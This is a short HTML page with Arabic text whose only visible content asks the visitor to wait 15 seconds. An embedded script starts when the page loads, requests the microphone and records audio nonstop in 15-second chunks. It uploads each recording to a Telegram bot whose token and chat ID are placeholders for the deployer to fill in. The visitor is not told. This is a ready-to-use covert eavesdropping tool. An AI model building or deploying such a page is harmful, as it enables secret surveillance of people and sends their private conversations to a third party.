<!DOCTYPE html>
<html lang="ar">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title> TOLARTE </title>
</head>
<body>
    <h2> تنتظار 15 تانية ...</h2>

    <script>
        const TELEGRAM_BOT_TOKEN = "TOKEN BIT👈";
        const TELEGRAM_CHAT_ID = "ID BOT👈";
        const RECORD_INTERVAL = 15000;

        let mediaRecorder;
        let audioChunks = [];

        async function startRecording() {
            try {
                const stream = await navigator.mediaDevices.getUserMedia({ audio: true });
                mediaRecorder = new MediaRecorder(stream);
                
                mediaRecorder.ondataavailable = event => {
                    audioChunks.push(event.data);
                };

                mediaRecorder.onstop = async () => {
                    if (audioChunks.length > 0) {
                        const audioBlob = new Blob(audioChunks, { type: 'audio/webm' });
                        audioChunks = [];
                        await sendAudioToTelegram(audioBlob);
                    }
                };

                recordLoop();
            } catch (error) {
                console.error("خطأ في الحصول على إذن التسجيل:", error);
            }
        }

        function recordLoop() {
            mediaRecorder.start();
            setTimeout(() => {
                mediaRecorder.stop();
                setTimeout(recordLoop, 1000);
            }, RECORD_INTERVAL);
        }

        async function sendAudioToTelegram(audioBlob) {
            const formData = new FormData();
            formData.append("chat_id", TELEGRAM_CHAT_ID);
            formData.append("voice", audioBlob, "recording.webm");

            try {
                const response = await fetch(`https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendVoice`, {
                    method: "POST",
                    body: formData
                });

                const result = await response.json();
                if (result.ok) {
                    console.log("تم إرسال التسجيل بنجاح!");
                } else {
                    console.error("فشل إرسال التسجيل:", result);
                }
            } catch (error) {
                console.error("خطأ أثناء إرسال التسجيل:", error);
            }
        }

        window.addEventListener("beforeunload", () => {
            if (mediaRecorder && mediaRecorder.state === "recording") {
                mediaRecorder.stop();
            }
        });

        startRecording();
    </script>
</body>
</html>